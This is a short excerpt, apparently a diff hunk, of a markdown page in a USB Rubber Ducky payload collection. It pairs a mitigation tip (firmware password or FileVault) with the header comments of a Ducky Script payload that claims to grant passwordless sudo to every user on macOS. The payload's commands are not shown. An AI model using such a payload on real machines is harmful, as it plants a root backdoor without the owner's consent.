abhinavvv03/Rubber-Duckey/Payload---OSX-Sudo-for-all-users-without-password.md

 Setup a [firmware password](https://support.apple.com/en-us/HT204455) or enable [FileVault](https://support.apple.com/en-us/HT204837) disk encryption.

+This method was tested on macOS 10.12 but should work for all versions. (?)

 ```
 REM MacOS AllSudo
 REM Enables Sudo access for all users without a password